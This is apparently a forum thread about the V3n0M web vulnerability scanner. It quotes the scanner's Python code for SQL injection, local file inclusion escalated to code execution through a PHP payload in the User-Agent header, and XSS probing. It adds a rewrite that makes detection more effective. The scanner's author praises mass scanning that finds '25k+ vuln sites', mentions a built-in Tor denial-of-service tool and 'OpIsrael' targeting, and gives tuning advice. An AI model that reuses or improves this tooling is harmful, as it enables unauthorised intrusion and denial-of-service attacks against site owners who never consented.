import re
import urllib2  # Python 2 scanner; R, O, B (colour codes), sqlerrors, logfile, vuln and col are globals defined elsewhere in the script

def ClassicINJ(url):
    # Error-based check: append a single quote to the whole URL and look for a DBMS error message
    EXT = "'"
    host = url + EXT
    try:
        source = urllib2.urlopen(host).read()
        for type, eMSG in sqlerrors.items():
            if re.search(eMSG, source):
                print R + "[!] w00t!,w00t!:", O + host, B + "Error:", type, R + " ---> SQL Injection Found"
                logfile.write("\n" + host)
                vuln.append(host)
                col.append(host)
                break
        else:
            pass
    except:
        pass
This should have been expanded to break all of the URL's GET parameters. This SQL injection scanner (above) also doesn't test POST.
def ClassicLFI(url):
    # Keep everything up to the last "=" so the traversal payload replaces the final GET parameter's value
    lfiurl = url.rsplit('=', 1)[0]
    if lfiurl[-1] != "=":
        lfiurl = lfiurl + "="
    for lfi in lfis:
        lfi = lfi.replace("\n", "")  # payloads are read from a file, one per line
        try:
            check = urllib2.urlopen(lfiurl + lfi).read()
            if re.findall("root:x", check):
                print R + "[!] w00t!,w00t!: ", O + lfiurl + lfi, R + " ---> Local File Include Found"
                lfi_log_file.write("\n" + lfiurl + lfi)
                vuln.append(lfiurl + lfi)
                # LFI to RCE: include /proc/self/environ, whose HTTP_USER_AGENT is attacker-controlled,
                # and check whether the PHP planted in the User-Agent was evaluated
                target = lfiurl + lfi
                target = target.replace("/etc/passwd", "/proc/self/environ")
                header = "<? echo md5(baltazar); ?>"
                try:
                    request_web = urllib2.Request(target)
                    request_web.add_header('User-Agent', header)
                    text = urllib2.urlopen(request_web)
                    text = text.read()
                    if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
                        print R + "[!] w00t!,w00t!: ", O + target, R + " ---> LFI to RCE Found"
                        rce_log_file.write("\n" + target)  # original had write("\n", target), a TypeError
                        vuln.append(target)
                except:
                    pass
        except:
            pass
The LFI tester (above) only works on UNIX-based systems. You can see they tried to break out the GET params, but it's kind of ugly. I also suggest they use a time()-based MD5 instead of the fixed "baltazar" MD5 to check whether the LFI was successful; otherwise it can easily be tricked into giving a false positive.
def ClassicXSS(url):
    # Append each XSS payload to the URL and look for the payload's marker text in the response
    for xss in xsses:
        try:
            source = urllib2.urlopen(url + xss.replace("\n", "")).read()
            if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source):
                print R + "[!] w00t!,w00t!: ", O + url + xss, R + " ---> XSS Found (might be false)"
                xss_log_file.write("\n" + url + xss)
                vuln.append(url + xss)
        except:
            pass
The XSS checker (above) can be hugely expanded, plus what about content filtering? Eh, this isn't very reliable. The SQL scanners are OK, probably the best part of the whole scanner. Nice code, but I think they have become lazy.
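The three complaints above (only the last GET parameter gets the quote, a fixed md5("baltazar") marker for the LFI-to-RCE check, and an XSS match that fires even when the reflection is HTML-encoded) can be addressed in a few small functions. The following is an added example written for this thread, not code from the poster or from V3n0M; the target URL is hypothetical and fake_target() is a constructed stand-in for a vulnerable site so that it runs offline.

```python
import hashlib
import os
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed, shortened list of DBMS error signatures; the scanner keeps
# its own `sqlerrors` dict.
SQL_ERRORS = {
    "MySQL": r"You have an error in your SQL syntax",
    "MSSQL": r"Unclosed quotation mark after the character string",
    "PostgreSQL": r"PostgreSQL.*?ERROR",
    "Oracle": r"ORA-\d{5}",
}


def inject_every_param(url, payload):
    """One candidate URL per GET parameter, with `payload` appended to that
    parameter only. ClassicINJ() appends a quote to the whole URL string,
    so only the final parameter is ever exercised."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    candidates = []
    for i, (name, value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, value + payload)
        candidates.append(urlunsplit(parts._replace(query=urlencode(mutated))))
    return candidates


def classify_sql_error(body):
    """Name of the first DBMS whose error signature appears in `body`, or None."""
    for dbms, pattern in SQL_ERRORS.items():
        if re.search(pattern, body):
            return dbms
    return None


def scan_sqli(url, fetch, payload="'"):
    """Error-based SQLi check over every parameter. `fetch(url) -> str` is
    passed in so the logic runs without a network; wrap urlopen for a real host."""
    findings = []
    for candidate in inject_every_param(url, payload):
        try:
            body = fetch(candidate)
        except Exception:
            continue
        dbms = classify_sql_error(body)
        if dbms is not None:
            findings.append((candidate, dbms))
    return findings


def fresh_token():
    """Per-run random token. A fixed md5('baltazar') has a fixed hash that any
    page can contain by accident or on purpose; a fresh token cannot be
    precomputed, so a hit means the probe really ran."""
    return os.urandom(8).hex()


def token_hash(token):
    return hashlib.md5(token.encode()).hexdigest()


def rce_probe(token):
    """User-Agent value to send when including /proc/self/environ."""
    return "<?php echo md5('%s'); ?>" % token


def rce_executed(body, token):
    """True only if the server evaluated the probe and echoed the hash."""
    return token_hash(token) in body


def xss_probe(token):
    return "<%s>" % token


def xss_reflected_raw(body, token):
    """True only if the probe came back with its angle brackets intact. An
    HTML-encoded reflection (&lt;token&gt;) still contains the bare token
    text, which is exactly what a plain 'XSS by ...' string match reports."""
    return xss_probe(token) in body


def fake_target(url):
    """Constructed stand-in for a vulnerable site (not a real host): a quote in
    `id` produces a MySQL error, while `page` is handled safely."""
    query = dict(parse_qsl(urlsplit(url).query))
    if "'" in query.get("id", ""):
        return "<b>Warning</b>: You have an error in your SQL syntax; check the manual"
    return "<html>ok</html>"


if __name__ == "__main__":
    url = "http://example.test/news.php?id=1&page=2"  # hypothetical target
    for candidate, dbms in scan_sqli(url, fake_target):
        print("[!] %s ---> %s error, SQL injection likely" % (candidate, dbms))
    token = fresh_token()
    print("send User-Agent:", rce_probe(token), "and grep for", token_hash(token))
```

Against a real host, replace fake_target with a callable that performs the request; the rest of the logic stays the same, and the token should be generated once per run so that log entries from different runs cannot be confused.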
This version is MASSIVELY outdated; it's a V.0.0.1 release, a beta release at that. I'm on version V.3.0.2 at the moment ;o I've stopped all work on it though, as the IRC I was part of is no longer fit for purpose, so I've left and "retired" from the scene until I can find a new home.
# V3n0MScanner.py - V.3.0.2
# -Increased headers list to include mobile device headers
# -Increased XSS detection by almost double; detects the actual bypass required for the attack to progress
# -Increased LFI detection rates
# -Increased URL detection rate for valid vuln sites
# -New banner style promoting V3n0M Scanner and version details
# -New method for identifying version make: V.x.y.z where x is the main release version, y is the number of beta release versions and z is the
# number of alpha release versions, i.e. V.3.0.2 is main release build 3 that has had 0 beta test phases and 2 alpha release phases
# -New search engines powering the scanner, so it should give a lot more results
# -Integrated DoS feature: now you can select to [1] scan as you used to for vulnerabilities or [2] TorSledgehammer DoS attack
# -New multi-platform version instead of the old separate Linux/Windows releases
# -TorSledgehammer DoS tool rotates attacks through multiple detected Internet connections to spread the attack workload and increase the DoS success rate
# -Added Israeli search engines for increasing the "hit" ratio for "OpIsrael" scans
Please note I do NOT support AnonSet anymore; the IRC's admin has no interest in protecting the safety of its members and frankly is emotionally unfit to run an IRC server. Anyone wishing to assist in working on the V3n0M toolkit or provide input, please let me know.
The original poster was incorrect; the correct best settings are 100 threads over Tor or 200 threads on a normal connection.
This code is really buggy and I can bet it needs a lot of editing work. Good luck with it.
Beta, says it all :3 and it wasn't that much editing really for anyone who understands the basics of Python... Oh, and you'll find even the beta version posted by the original poster still worked fine; even if it would give a 15% false-positive hit, with an "all dorks scan" on .com you'd still get 25k+ vuln sites. (* Not to mention the original poster posted a Windows-only version o.o, which might explain why some people failed to get it to run lol. *)